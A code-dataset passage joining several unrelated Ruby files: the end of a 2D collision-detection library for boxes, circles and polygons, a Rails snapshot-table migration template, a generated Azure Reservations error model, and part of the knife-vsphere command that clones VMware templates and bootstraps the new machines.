def initialize(left, right, bottom, top)
@left = left
@right = right
@bottom = bottom
@top = top
@width = top - bottom
@height = right - left
end
# @return [Array<Float>]
def aabb_center
[(@left + @right) / 2.0, (@top + @bottom) / 2.0]
end
# @param [Float] dx
# @param [Float] dy
# @return [nil]
def shift(dx, dy)
@left += dx
@right += dx
@bottom += dy
@top += dy
end
# @param [Float] x
# @param [Float] y
# @return [Boolean] Whether or not the point is contained within the shape.
def point_inside?(x, y)
raise "The method point_inside?(x,y) must be defined by the class that inherits Shape2D."
end
end
class Box < Shape2D
# @param [Float, Integer] left
# @param [Float, Integer] right
# @param [Float, Integer] bottom
# @param [Float, Integer] top
# @return [Box]
def initialize(left, right, bottom, top)
super(left, right, bottom, top)
end
# @param [Integer] x
# @param [Integer] y
# @param [Integer] w
# @param [Integer] h
# @return [GeoGeo::Box]
def Box.new_drgtk(x, y, w, h)
Box.new(x, x + w, y, y + h)
end
# @param [Float] x
# @param [Float] y
# @return [Boolean] Whether or not the point is contained within the shape.
def point_inside?(x, y)
(@left..@right).cover?(x) && (@bottom..@top).cover?(y)
end
protected
# @return [Integer]
def __internal_test_mtx_idx
0
end
end
class Circle < Shape2D
# @return [Float]
attr_reader :x, :y, :r, :r2
# @param [Float] x
# @param [Float] y
# @param [Float] r
# @return [GeoGeo::Circle]
def initialize(x, y, r)
@x = x
@y = y
@r = r
@r2 = r * r
super(x - r, x + r, y - r, y + r)
end
# @param [Float] x
# @param [Float] y
# @return [nil]
def set_center(x, y)
shift(x - @x, y - @y)
end
# @return [Array<Float>]
def get_center
[@x, @y]
end
# @param [Float] dx
# @param [Float] dy
# @return [nil]
def shift(dx, dy)
super(dx, dy)
@x += dx
@y += dy
end
# @param [Float] x
# @param [Float] y
# @return [Boolean] Whether or not the point is contained within the shape.
def point_inside?(x, y)
(@x - x) * (@x - x) + (@y - y) * (@y - y) <= @r2
end
protected
# @return [Integer]
def __internal_test_mtx_idx
1
end
end
class Polygon < Shape2D
# @return [Array<Array<Float>>]
attr_reader :verts, :hull_verts, :hull_norms
# @return [Array<Float>]
attr_reader :verts_x, :hull_verts_x, :hull_norms_x, :verts_y, :hull_verts_y, :hull_norms_y
# @return [Boolean]
attr_reader :convex
# @return [Float]
attr_reader :theta
# @param [Array<Array<Float, Integer>>] verts List of vertices in clockwise order. If verts[0]!=verts[-1], a copy of the first vert will be appended.
# @param [Array<Float>] center The center point of the polygon. Defaults to the center of the AABB
# @param [Float] theta The initial angle of the polygon, in radians
# @return [GeoGeo::Polygon]
def initialize(verts, center = nil, theta = 0.0)
# trace!
@verts = verts.map(&:clone)
@verts << [*@verts[0]] if @verts[0] != @verts[-1]
@verts_x = @verts.map(&:first)
@verts_y = @verts.map(&:last)
__calc_hull
@convex = @verts == @hull_verts
@theta = theta
super(*@verts.map(&:x).minmax, *@verts.map(&:y).minmax)
# @type [Array<Float>]
@center = (center || aabb_center).clone
end
# @param [Float] theta
# @return [Float]
def theta=(theta)
d_theta = theta - @theta
return theta if d_theta == 0
c, s = Math.cos(d_theta), Math.sin(d_theta)
t, b, l, r = @center.y, @center.y, @center.x, @center.x
index = 0
limit = @verts.length
while index < limit
vx = @verts_x[index]
vy = @verts_y[index]
vx, vy = @center.x + (vx - @center.x) * c - (vy - @center.y) * s, @center.y + (vx - @center.x) * s + (vy - @center.y) * c
@verts_x[index] = vx
@verts_y[index] = vy
@verts[index] = [vx, vy]
l = vx if vx < l
r = vx if vx > r
b = vy if vy < b
t = vy if vy > t
index+=1
end
index = 0
limit = @hull_verts.length
while index < limit
vx = @hull_verts_x[index]
vy = @hull_verts_y[index]
vx, vy = @center.x + (vx - @center.x) * c - (vy - @center.y) * s, @center.y + (vx - @center.x) * s + (vy - @center.y) * c
@hull_verts_x[index] = vx
@hull_verts_y[index] = vy
@hull_verts[index] = [vx, vy]
index+=1
end
index = 0
limit = @hull_norms.length
while index < limit
vx = @hull_norms_x[index]
vy = @hull_norms_y[index]
vx, vy = vx * c - vy * s, vx * s + vy * c
@hull_norms_x[index] = vx
@hull_norms_y[index] = vy
@hull_norms[index] = [vx, vy]
index+=1
end
@left, @right, @bottom, @top, @width, @height = l, r, b, t, r - l, t - b
@theta = theta
end
# @param [Array<Float>] point
# @return [nil]
def set_center(point)
shift(point.x - @center.x, point.y - @center.y)
end
# @param [Float] dx
# @param [Float] dy
# @return [nil]
def shift(dx, dy)
super(dx, dy)
@center.x += dx
@center.y += dy
@verts.each do |v|
v.x += dx
v.y += dy
end
@hull_verts.each do |v|
v.x += dx
v.y += dy
end
@verts_x = @verts.map(&:x)
@verts_y = @verts.map(&:y)
@hull_verts_x = @hull_verts.map(&:x)
@hull_verts_y = @hull_verts.map(&:y)
end
# @param [Float] x
# @param [Float] y
# @return [Boolean] Whether or not the point is contained within the shape.
def point_inside?(x, y)
return false unless @left < x && x < @right && @bottom < y && y < @top
winding_number = 0
# This isn't very idiomatic ruby, but it is faster this way
index = 0
limit = @verts.length - 1
while index < limit
if @verts_y[index] <= y
winding_number += 1 if @verts_y[index + 1] > y && __left(@verts_x[index], @verts_y[index], @verts_x[index + 1], @verts_y[index + 1], x, y) > 0
else
winding_number -= 1 if @verts_y[index + 1] <= y && __left(@verts_x[index], @verts_y[index], @verts_x[index + 1], @verts_y[index + 1], x, y) < 0
end
index += 1
end
winding_number != 0
end
private
# @param [Float] ax
# @param [Float] ay
# @param [Float] bx
# @param [Float] by
# @param [Float] cx
# @param [Float] cy
# @return [Float]
def __left(ax, ay, bx, by, cx, cy)
(bx - ax) * (cy - ay) - (cx - ax) * (by - ay)
end
# @return [nil]
def __calc_hull
if @verts.length > 4
pivot = @verts[0]
@verts.each do |v|
pivot = [*v] if v.y < pivot.y || (v.y == pivot.y && v.x < pivot.x)
end
points = @verts.map do |v|
{x: [*v], y: [Math.atan2(v.y - pivot.y, v.x - pivot.x), (v.x - pivot.x) * (v.x - pivot.x) + (v.y - pivot.y) * (v.y - pivot.y)]}
end.sort_by(&:y)
# @type [Array] points
points = points.map(&:x)
hull_verts = []
hull_verts_x = []
hull_verts_y = []
points.each do |v|
vx = v.x
vy = v.y
if hull_verts.length < 3
if hull_verts[-1] != v
hull_verts.push([*v])
hull_verts_x.push(vx)
hull_verts_y.push(vy)
end
else
while __left(hull_verts_x[-2], hull_verts_y[-2], hull_verts_x[-1], hull_verts_y[-1], vx, vy) < 0
hull_verts.pop
hull_verts_x.pop
hull_verts_y.pop
end
if hull_verts[-1] != v
hull_verts.push([*v])
hull_verts_x.push(vx)
hull_verts_y.push(vy)
end
end
end
@hull_verts = hull_verts
@hull_verts_x = hull_verts_x
@hull_verts_y = hull_verts_y
if @hull_verts.length + 1 == @verts.length
tmp = @hull_verts.index(@verts[0])
@hull_verts.rotate!(tmp)
@hull_verts_x.rotate!(tmp)
@hull_verts_y.rotate!(tmp)
end
@hull_verts.push([*@hull_verts[0]])
@hull_verts_x.push(@hull_verts_x[0])
@hull_verts_y.push(@hull_verts_y[0])
else
@hull_verts = @verts.map(&:clone)
@hull_verts_x = @verts_x.clone
@hull_verts_y = @verts_y.clone
end
@hull_norms = @hull_verts.each_cons(2).map do
# @type [Array<Float>] v1
# @type [Array<Float>] v2
|v1, v2|
# @type [Array<Float>] norm
norm = [v2.y - v1.y, v1.x - v2.x]
# @type [Array<Float>] norm
norm = [-norm.x, -norm.y] if norm.x < 0
nx = norm.x
ny = norm.y
mag = Math.sqrt((nx * nx) + (ny * ny))
norm.x /= mag
norm.y /= mag
norm
end.uniq
@hull_norms_x = @hull_norms.map(&:first)
@hull_norms_y = @hull_norms.map(&:last)
end
protected
# @return [Integer]
def __internal_test_mtx_idx
2
end
end
# @param [GeoGeo::Box, GeoGeo::Circle, GeoGeo::Polygon] a
# @param [GeoGeo::Box, GeoGeo::Circle, GeoGeo::Polygon] b
# @return [Boolean]
def GeoGeo::intersect?(a, b)
#noinspection RubyResolve
GeoGeo::MagicHelper.intersect?(a, b)
end
end
# Hide away all the internal logic
class GeoGeoHelper
TestMtx = [
[:box_intersect?, :box_circ_intersect?, :box_poly_intersect?],
[:circ_box_intersect?, :circ_intersect?, :circ_poly_intersect?],
[:poly_box_intersect?, :poly_circ_intersect?, :poly_intersect?],
]
# @param [GeoGeo::Box, GeoGeo::Circle, GeoGeo::Polygon] a
# @param [GeoGeo::Box, GeoGeo::Circle, GeoGeo::Polygon] b
# @return [Boolean]
def intersect?(a, b)
self.send(GeoGeoHelper::TestMtx[a.__internal_test_mtx_idx][b.__internal_test_mtx_idx], a, b)
end
# @param [GeoGeo::Shape2D] a
# @param [GeoGeo::Shape2D] b
# @return [Boolean]
def aabb_intersect?(a, b)
(a.left <= b.right) && (b.left <= a.right) && (a.bottom <= b.top) && (b.bottom <= a.top)
end
# @param [GeoGeo::Box] a
# @param [GeoGeo::Box] b
# @return [Boolean]
def box_intersect?(a, b)
aabb_intersect?(a, b)
end
# @param [GeoGeo::Box] a
# @param [GeoGeo::Circle] b
# @return [Boolean]
def box_circ_intersect?(a, b)
# AABBxAABB test to trivially reject.
return false unless aabb_intersect?(a, b)
dx = b.x - (b.x < a.left ? a.left : b.x > a.right ? a.right : b.x)
dy = b.y - (b.y < a.bottom ? a.bottom : b.y > a.top ? a.top : b.y)
return dx * dx + dy * dy <= b.r2
end
# @param [GeoGeo::Box] a
# @param [GeoGeo::Polygon] b
# @return [Boolean]
def box_poly_intersect?(a, b)
return false unless aabb_intersect?(a, b)
# Test if the box is inside the polygon
return true if b.point_inside?(a.left, a.top)
#return true if b.point_inside?(a.right, a.top)
#return true if b.point_inside?(a.left, a.bottom)
#return true if b.point_inside?(a.right, a.bottom)
# TODO: This feels like it is hilariously over engineered.
index = 0
limit = b.verts.length
cs_verts = Array.new(b.verts.length)
while index < limit
vx = b.verts_x[index]
vy = b.verts_y[index]
code = 0b0000
if vx < a.left
code |= 0b0001
elsif vx > a.right
code |= 0b0010
end
if vy < a.bottom
code |= 0b0100
elsif vy > a.top
code |= 0b1000
end
return true if code == 0b0000 # Vertex within box indicates collision. Return early
cs_verts[index] = [vx, vy, code]
index += 1
end
index = 0
limit = cs_verts.length - 1
cs_edges = []
while index < limit
cs_edges << [cs_verts[index], cs_verts[index + 1]] if 0b0000 == cs_verts[index][2] & cs_verts[index + 1][2]
index += 1
end
# Test if any lines trivially cross opposite bounds, return early if so
index = 0
limit = cs_edges.length
while index < limit
return true if cs_edges[index][0][2] | cs_edges[index][1][2] == 0b0011 || cs_edges[index][0][2] | cs_edges[index][1][2] == 0b1100
index += 1
end
# Test if any lines non-trivially cross a relevant boundary
index = 0
limit = cs_edges.length
while index < limit
# @type [Array<Float>] p1
# @type [Array<Float>] p2
p1, p2 = cs_edges[index]
x_min, x_max = p1.x, p2.x
x_min, x_max = x_max, x_min if (x_min > x_max)
x_min, x_max = x_min.greater(a.left), x_max.lesser(a.right)
return false if x_min > x_max
y_min, y_max = p1.y, p2.y
dx = p2.x - p1.x
if dx.abs > 0.0000001
ma = (p2.y - p1.y) / dx
mb = p1.y - ma * p1.x
y_min = ma * x_min + mb
y_max = ma * x_max + mb
end
y_min, y_max = y_max, y_min if (y_min > y_max)
y_max = y_max.lesser(a.top)
y_min = y_min.greater(a.bottom)
return true if y_min <= y_max
index += 1
end
false
end
# @param [GeoGeo::Circle] a
# @param [GeoGeo::Box] b
# @return [Boolean]
def circ_box_intersect?(a, b)
box_circ_intersect?(b, a)
end
# @param [GeoGeo::Circle] a
# @param [GeoGeo::Circle] b
# @return [Boolean]
def circ_intersect?(a, b)
# Don't do a preliminary AABB test here. It makes things slower.
dx = a.x - b.x
dy = a.y - b.y
dx * dx + dy * dy <= (a.r + b.r) * (a.r + b.r)
end
# @param [GeoGeo::Circle] a
# @param [GeoGeo::Polygon] b
# @return [Boolean]
def circ_poly_intersect?(a, b)
return false unless aabb_intersect?(a, b)
return true if b.point_inside?(a.x, a.y)
index = 0
limit = b.verts.length - 1
while index < limit
# @type p1 [Array<Float>]
# @type p2 [Array<Float>]
# p1, p2 = b.verts.values_at(index, index+1)
p1x = b.verts_x[index]
p1y = b.verts_y[index]
p2x = b.verts_x[index + 1]
p2y = b.verts_y[index + 1]
acx = a.x - p1x
acy = a.y - p1y
return true if acx * acx + acy * acy <= a.r2 # Vert in circle. Early return
abx = p2x - p1x
aby = p2y - p1y
t = ((acx * abx + acy * aby) / (abx * abx + aby * aby)).clamp(0, 1)
tmp1 = (abx * t + p1x) - a.x
tmp2 = (aby * t + p1y) - a.y
return true if (tmp1 * tmp1 + tmp2 * tmp2) <= a.r2
index += 1
end
false
end
# @param [GeoGeo::Polygon] a
# @param [GeoGeo::Box] b
# @return [Boolean]
def poly_box_intersect?(a, b)
box_poly_intersect?(b, a)
end
# @param [GeoGeo::Polygon] a
# @param [GeoGeo::Circle] b
# @return [Boolean]
def poly_circ_intersect?(a, b)
circ_poly_intersect?(b, a)
end
# @param [GeoGeo::Polygon] a
# @param [GeoGeo::Polygon] b
# @return [Boolean]
def poly_intersect?(a, b)
return false unless aabb_intersect?(a, b)
# TODO: Polygons
# Phase 1: SAT test with the convex hulls. If the convex hulls don't collide, the polygons don't collide.
return false unless sat_intersect?(a.hull_norms_x,a.hull_norms_y, a.hull_verts_x,a.hull_verts_y, b.hull_verts_x,b.hull_verts_y)
return false unless sat_intersect?(b.hull_norms_x,b.hull_norms_y, a.hull_verts_x,a.hull_verts_y, b.hull_verts_x,b.hull_verts_y)
return true if a.convex && b.convex # If both are convex, SAT is all you need to see if they are colliding.
# Phase 2: Check if one covers the other, using the first vert as a proxy.
return true if a.point_inside?(b.verts_x[0], b.verts_y[0]) || b.point_inside?(a.verts_x[0], a.verts_y[0])
# Phase 3: Check if the two perimeters overlap.
index = 0
limit = a.verts.length - 1
jimit = b.verts.length - 1
while index < limit
jndex = 0
e1x1 = a.verts_x[index]
e1x2 = a.verts_x[index+1]
e1y1 = a.verts_y[index]
e1y2 = a.verts_y[index+1]
while jndex < jimit
return true if line_line_intersect?(e1x1,e1y1,e1x2,e1y2,b.verts_x[jndex],b.verts_y[jndex],b.verts_x[jndex+1],b.verts_y[jndex+1])
jndex += 1
end
index += 1
end
false
end
private
# @param [Array<Float>] v1
# @param [Array<Float>] v2
# @return [Float]
def dot(v1, v2)
(v1.x * v2.x) + (v1.y * v2.y)
end
# @param [Float] ax
# @param [Float] ay
# @param [Float] bx
# @param [Float] by
# @param [Float] cx
# @param [Float] cy
# @return [Boolean]
def ccw?(ax, ay, bx, by, cx, cy)
(cy - ay) * (bx - ax) > (by - ay) * (cx - ax)
end
# @param [Float] ax1
# @param [Float] ay1
# @param [Float] ax2
# @param [Float] ay2
# @param [Float] bx1
# @param [Float] by1
# @param [Float] bx2
# @param [Float] by2
# @return [Boolean]
def line_line_intersect?(ax1,ay1,ax2,ay2,bx1,by1,bx2,by2)
ccw?(ax1, ay1, bx1, by1, bx2, by2) != ccw?(ax2, ay2, bx1, by1, bx2, by2) && ccw?(ax1, ay1, ax2, ay2, bx1, by1) != ccw?(ax1, ay1, ax2, ay2, bx2, by2)
end
# @param [Array<Float>] axes_x
# @param [Array<Float>] axes_y
# @param [Array<Float>] vert_ax
# @param [Array<Float>] vert_ay
# @param [Array<Float>] vert_bx
# @param [Array<Float>] vert_by
# @return [Boolean]
def sat_intersect?(axes_x,axes_y,vert_ax,vert_ay, vert_bx,vert_by)
index, limit = 0, axes_x.length
while index < limit
axis_x = axes_x[index]
axis_y = axes_y[index]
# Test to see if the polygons do *not* overlap on this axis.
a_min, a_max = 1e300, -1e300
jndex, jimit = 0, vert_ax.length
while jndex < jimit
tmp = axis_x * vert_ax[jndex] + axis_y * vert_ay[jndex]
a_min = tmp if tmp < a_min
a_max = tmp if tmp > a_max
jndex += 1
end
b_min, b_max = 1e300, -1e300
jndex, jimit = 0, vert_bx.length
while jndex < jimit
tmp = axis_x * vert_bx[jndex] + axis_y * vert_by[jndex]
b_min = tmp if tmp < b_min
b_max = tmp if tmp > b_max
jndex += 1
end
return false if (a_min > b_max) || (b_min > a_max) # A separating axis exists. Thus, they cannot be intersecting.
index += 1
end
true
end
end
# Adds the MagicHelper sneakily, so it isn't listed in code completion.
# todo this is dumb
GeoGeo.const_set("MagicHelper", GeoGeoHelper.new) unless GeoGeo.const_defined?(:MagicHelper)
| 29.074074 | 153 | 0.562049 |
4a8ca070190839e8304a28fce5c0a1c793442e0e | 622 | class <%= migration_class_name %> < ActiveRecord::Migration<%= migration_version %>
def change
create_table :<%= model_underscored %>_snapshots do |t|
# model to be snapshoted
t.references :<%= model_underscored %>, index: true, null: false, foreign_key: true
# snapshoted attributes
t.jsonb :object, null: false
<% relations_has_one.each do |relation| %>
t.jsonb :<%= relation.underscore %>_object<% end %>
<% relations_has_many.each do |relation| %>
t.jsonb :<%= relation.underscore %>_object, array: true, default: []<% end %>
t.timestamps null: false
end
end
end | 36.588235 | 89 | 0.660772 |
6150078cbb1b524e6ca9692fb8e8ab2d996f9f91 | 1,099 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Reservations::Mgmt::V2017_11_01
module Models
#
# Model object.
#
#
class Error
include MsRestAzure
# @return [ExtendedErrorInfo]
attr_accessor :error
#
# Mapper for Error class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'Error',
type: {
name: 'Composite',
class_name: 'Error',
model_properties: {
error: {
client_side_validation: true,
required: false,
serialized_name: 'error',
type: {
name: 'Composite',
class_name: 'ExtendedErrorInfo'
}
}
}
}
}
end
end
end
end
| 22.428571 | 70 | 0.517743 |
79bbef9fa5612b019ad5fafd3de3ca8991986b9a | 30,394 | # Author:: Ezra Pagel (<[email protected]>)
# Contributor:: Jesse Campbell (<[email protected]>)
# Contributor:: Bethany Erskine (<[email protected]>)
# Contributor:: Adrian Stanila (https://github.com/sacx)
# Contributor:: Ryan Hass ([email protected])
# License:: Apache License, Version 2.0
#
require "chef/knife"
require "chef/knife/base_vsphere_command"
require "chef/knife/customization_helper"
require "chef/knife/search_helper"
require "ipaddr"
require "netaddr"
require "securerandom"
# VsphereVmClone extends the BaseVspherecommand
class Chef::Knife::VsphereVmClone < Chef::Knife::BaseVsphereCommand
banner "knife vsphere vm clone VMNAME (options)"
# A AUTO_MAC for NIC?
AUTO_MAC ||= "auto".freeze
# A NO IP for you to use!
NO_IPS ||= "".freeze
# a linklayer origin is an actual nic
ORIGIN_IS_REAL_NIC ||= "linklayer".freeze
# include Chef::Knife::WinrmBase
include CustomizationHelper
include SearchHelper
deps do
require "chef/json_compat"
Chef::Knife::Bootstrap.load_deps
end
common_options
option :dest_folder,
long: "--dest-folder FOLDER",
description: "The folder into which to put the cloned VM"
option :datastore,
long: "--datastore STORE",
description: "The datastore into which to put the cloned VM"
option :datastorecluster,
long: "--datastorecluster STORE",
description: "The datastorecluster into which to put the cloned VM"
option :host,
long: "--host HOST",
description: "The host into which to put the cloned VM"
option :resource_pool,
long: "--resource-pool POOL",
description: "The resource pool or cluster into which to put the cloned VM"
option :source_vm,
long: "--template TEMPLATE",
description: "The source VM / Template to clone from"
option :linked_clone,
long: "--linked-clone",
description: "Indicates whether to use linked clones.",
boolean: false
option :thin_provision,
long: "--thin-provision",
description: "Indicates whether disk should be thin provisioned.",
boolean: true
option :annotation,
long: "--annotation TEXT",
description: "Add TEXT in Notes field from annotation"
option :customization_spec,
long: "--cspec CUST_SPEC",
description: "The name of any customization specification to apply"
option :customization_plugin,
long: "--cplugin CUST_PLUGIN_PATH",
description: "Path to plugin that implements KnifeVspherePlugin.customize_clone_spec and/or KnifeVspherePlugin.reconfig_vm"
option :customization_plugin_data,
long: "--cplugin-data CUST_PLUGIN_DATA",
description: "String of data to pass to the plugin. Use any format you wish."
option :customization_vlan,
long: "--cvlan CUST_VLANS",
description: "Comma-delimited list of VLAN names for network adapters to join"
option :customization_sw_uuid,
long: "--sw-uuid SWITCH_UUIDS",
description: "Comma-delimited list of distributed virtual switch UUIDs for network adapter to connect, use 'auto' to automatically assign"
option :customization_macs,
long: "--cmacs CUST_MACS",
description: "Comma-delimited list of MAC addresses for network adapters",
default: AUTO_MAC
option :customization_ips,
long: "--cips CUST_IPS",
description: "Comma-delimited list of CIDR IPs for customization",
default: NO_IPS
option :customization_dns_ips,
long: "--cdnsips CUST_DNS_IPS",
description: "Comma-delimited list of DNS IP addresses"
option :customization_dns_suffixes,
long: "--cdnssuffix CUST_DNS_SUFFIXES",
description: "Comma-delimited list of DNS search suffixes"
option :customization_gw,
long: "--cgw CUST_GW",
description: "CIDR IP of gateway for customization"
option :customization_hostname,
long: "--chostname CUST_HOSTNAME",
description: "Unqualified hostname for customization"
option :customization_domain,
long: "--cdomain CUST_DOMAIN",
description: "Domain name for customization"
option :customization_tz,
long: "--ctz CUST_TIMEZONE",
description: "Timezone invalid 'Area/Location' format"
option :customization_cpucount,
long: "--ccpu CUST_CPU_COUNT",
description: "Number of CPUs"
option :customization_corespersocket,
long: "--ccorespersocket CUST_CPU_CORES_PER_SOCKET",
description: "Number of CPU Cores per Socket"
option :customization_memory,
long: "--cram CUST_MEMORY_GB",
description: "Gigabytes of RAM"
option :customization_memory_reservation,
long: "--cram_reservation CUST_MEMORY_RESERVATION_GB",
description: "Gigabytes of RAM"
option :power,
long: "--start",
description: "Indicates whether to start the VM after a successful clone",
boolean: false
option :bootstrap,
long: "--bootstrap",
description: "Indicates whether to bootstrap the VM",
boolean: false
option :environment,
long: "--environment ENVIRONMENT",
description: "Environment to add the node to for bootstrapping"
option :fqdn,
long: "--fqdn SERVER_FQDN",
description: "Fully qualified hostname for bootstrapping"
option :bootstrap_msi_url,
long: "--bootstrap-msi-url URL",
description: "Location of the Chef Client MSI. The default templates will prefer to download from this location."
option :bootstrap_protocol,
long: "--bootstrap-protocol protocol",
description: "Protocol to bootstrap windows servers. options: winrm/ssh",
proc: proc { |key| Chef::Config[:knife][:bootstrap_protocol] = key },
default: nil
option :disable_customization,
long: "--disable-customization",
description: "Disable default customization",
boolean: true,
default: false
option :log_level,
short: "-l LEVEL",
long: "--log_level",
description: "Set the log level (debug, info, warn, error, fatal) for chef-client",
proc: ->(l) { l.to_sym }
option :mark_as_template,
long: "--mark_as_template",
description: "Indicates whether to mark the new vm as a template",
boolean: false
option :random_vmname,
long: "--random-vmname",
description: "Creates a random VMNAME starts with vm-XXXXXXXX",
boolean: false
option :random_vmname_prefix,
long: "--random-vmname-prefix PREFIX",
description: "Change the VMNAME prefix",
default: "vm-"
option :sysprep_timeout,
long: "--sysprep_timeout TIMEOUT",
description: "Wait TIMEOUT seconds for sysprep event before continuing with bootstrap",
default: 600
option :bootstrap_nic,
long: "--bootstrap-nic INTEGER",
description: "Network interface to use when multiple NICs are defined on a template.",
default: 0
option :bootstrap_ipv4,
long: "--bootstrap-ipv4",
description: "Force using an IPv4 address when a NIC has both IPv4 and IPv6 addresses.",
default: false
def run
check_license
plugin_setup!
validate_name_args!
validate_protocol!
validate_first_boot_attributes!
validate_winrm_transport_opts!
validate_policy_options!
plugin_validate_options!
winrm_warn_no_ssl_verification
warn_on_short_session_timeout
plugin_create_instance!
return unless get_config(:bootstrap)
$stdout.sync = true
connect!
register_client
content = render_template
bootstrap_path = upload_bootstrap(content)
perform_bootstrap(bootstrap_path)
plugin_finalize
ensure
connection.del_file!(bootstrap_path) if connection && bootstrap_path
end
# @return [TrueClass] If options are valid or exits
def plugin_validate_options!
unless using_supplied_hostname? ^ using_random_hostname?
show_usage
fatal_exit("You must specify a virtual machine name OR use --random-vmname")
end
abort "--template or knife[:source_vm] must be specified" unless config[:source_vm]
if get_config(:datastore) && get_config(:datastorecluster)
abort "Please select either datastore or datastorecluster"
end
if get_config(:customization_macs) != AUTO_MAC && get_config(:customization_ips) == NO_IPS
abort('Must specify IP numbers with --cips when specifying MAC addresses with --cmacs, can use "dhcp" as placeholder')
end
end
attr_accessor :server_name
alias host_descriptor server_name
# Create the server that we will bootstrap, if necessary
#
# Plugins that subclass bootstrap, e.g. knife-ec2, can use this method to call out to an API to build an instance of the server we wish to bootstrap
#
# @return [TrueClass] If instance successfully created, or exits
def plugin_create_instance!
config[:chef_node_name] = vmname unless get_config(:chef_node_name)
vim = vim_connection
vim.serviceContent.virtualDiskManager
dc = datacenter
src_vm = get_vm_by_name(get_config(:source_vm), get_config(:folder)) || fatal_exit("Could not find template #{get_config(:source_vm)}")
create_delta_disk(src_vm) if get_config(:linked_clone)
clone_spec = generate_clone_spec(src_vm.config)
cust_folder = config[:dest_folder] || get_config(:folder)
dest_folder = cust_folder.nil? ? src_vm.vmFolder : find_folder(cust_folder)
task = src_vm.CloneVM_Task(folder: dest_folder, name: vmname, spec: clone_spec)
puts "Cloning template #{get_config(:source_vm)} to new VM #{vmname}"
pp clone_spec if log_verbose?
begin
task.wait_for_completion
rescue RbVmomi::Fault => e
fault = e.fault
if fault.class == RbVmomi::VIM::NicSettingMismatch
abort "There is a mismatch in the number of NICs on the template (#{fault.numberOfNicsInVM}) and what you've passed on the command line with --cips (#{fault.numberOfNicsInSpec}). The VM has been cloned but not customized."
elsif fault.class == RbVmomi::VIM::DuplicateName
ui.info "VM already exists, proceeding to bootstrap"
else
raise e
end
end
puts "Finished creating virtual machine #{vmname}"
if customization_plugin && customization_plugin.respond_to?(:reconfig_vm)
target_vm = find_in_folder(dest_folder, RbVmomi::VIM::VirtualMachine, vmname) || abort("VM could not be found in #{dest_folder}")
customization_plugin.reconfig_vm(target_vm)
end
return if get_config(:mark_as_template)
if get_config(:power) || get_config(:bootstrap)
vm = get_vm_by_name(vmname, cust_folder) || fatal_exit("VM #{vmname} not found")
begin
vm.PowerOnVM_Task.wait_for_completion
rescue RbVmomi::Fault => e
raise e unless e.fault.class == RbVmomi::VIM::InvalidPowerState # Ignore if it's already turned on
end
puts "Powered on virtual machine #{vmname}"
end
return unless get_config(:bootstrap)
protocol = get_config(:bootstrap_protocol)
if windows?(src_vm.config)
protocol ||= "winrm"
connect_port ||= 5985
unless config[:disable_customization]
# Wait for customization to complete
puts "Waiting for customization to complete..."
CustomizationHelper.wait_for_sysprep(vm, vim, Integer(get_config(:sysprep_timeout)), 10)
puts "Customization Complete"
end
connect_host = guest_address(vm)
self.server_name = connect_host
Chef::Log.debug("Connect Host for winrm Bootstrap: #{connect_host}")
wait_for_access(connect_host, connect_port, protocol)
else
connect_host = guest_address(vm)
self.server_name = connect_host
connect_port ||= 22
Chef::Log.debug("Connect Host for SSH Bootstrap: #{connect_host}")
protocol ||= "ssh"
wait_for_access(connect_host, connect_port, protocol)
end
end
# Perform any setup necessary by the plugin
#
# Plugins that subclass bootstrap, e.g. knife-ec2, can use this method to create connection objects
#
# @return [TrueClass] If instance successfully created, or exits
def plugin_setup!; end
# Perform any teardown or cleanup necessary by the plugin
#
# Plugins that subclass bootstrap, e.g. knife-ec2, can use this method to display a message or perform any cleanup
#
# @return [void]
def plugin_finalize; end
def validate_name_args!; end
def ipv4_address(vm)
puts "Waiting for a valid IPv4 address..."
# Multiple reboots occur during guest customization in which a link-local
# address is assigned. As such, we need to wait until a routable IP address
# becomes available. This is most commonly an issue with Windows instances.
sleep 2 while vm_is_waiting_for_ip?(vm)
vm.guest.net[bootstrap_nic_index].ipAddress.detect { |addr| IPAddr.new(addr).ipv4? }
end
def vm_is_waiting_for_ip?(vm)
first_ip_address = vm.guest.net[bootstrap_nic_index].ipConfig.ipAddress.detect { |addr| IPAddr.new(addr.ipAddress).ipv4? }
first_ip_address.nil? || first_ip_address.origin == ORIGIN_IS_REAL_NIC
end
def guest_address(vm)
puts "Waiting for network interfaces to become available..."
sleep 2 while vm.guest.net.empty? || !vm.guest.ipAddress
ui.info "Found address #{vm.guest.ipAddress}" if log_verbose?
config[:fqdn] = if config[:bootstrap_ipv4]
ipv4_address(vm)
elsif config[:fqdn]
get_config(:fqdn)
else
# Use the first IP which is not a link-local address.
# This is the closest thing to vm.guest.ipAddress but
# allows specifying a NIC.
vm.guest.net[bootstrap_nic_index].ipConfig.ipAddress.detect do |addr|
addr.origin != "linklayer"
end.ipAddress
end
end
def wait_for_access(connect_host, connect_port, protocol)
if winrm?
if get_config(:winrm_ssl) && get_config(:connection_port) == "5985"
config[:connection_port] = "5986"
end
connect_port = get_config(:connection_port)
print "\n#{ui.color("Waiting for winrm access to become available on #{connect_host}:#{connect_port}", :magenta)}"
print(".") until tcp_test_winrm(connect_host, connect_port) do
sleep 10
puts("done")
end
else
print "\n#{ui.color("Waiting for sshd access to become available on #{connect_host}:#{connect_port}", :magenta)}"
print(".") until tcp_test_ssh(connect_host, connect_port) do
sleep 10
puts("done")
end
end
connect_port
end
def create_delta_disk(src_vm)
disks = src_vm.config.hardware.device.grep(RbVmomi::VIM::VirtualDisk)
disks.select { |disk| disk.backing.parent.nil? }.each do |disk|
spec = {
deviceChange: [
{
operation: :remove,
device: disk,
},
{
operation: :add,
fileOperation: :create,
device: disk.dup.tap do |new_disk|
new_disk.backing = new_disk.backing.dup
new_disk.backing.fileName = "[#{disk.backing.datastore.name}]"
new_disk.backing.parent = disk.backing
end,
},
],
}
src_vm.ReconfigVM_Task(spec: spec).wait_for_completion
end
end
def find_available_hosts
hosts = traverse_folders_for_computeresources(datacenter.hostFolder)
fatal_exit("No ComputeResource found - Use --resource-pool to specify a resource pool or a cluster") if hosts.empty?
hosts.reject!(&:nil?)
hosts.reject! { |host| host.host.all? { |h| h.runtime.inMaintenanceMode } }
fatal_exit "All hosts in maintenance mode!" if hosts.empty?
if get_config(:datastore)
hosts.reject! { |host| !host.datastore.include?(find_datastore(get_config(:datastore))) }
end
fatal_exit "No hosts have the requested Datastore available! #{get_config(:datastore)}" if hosts.empty?
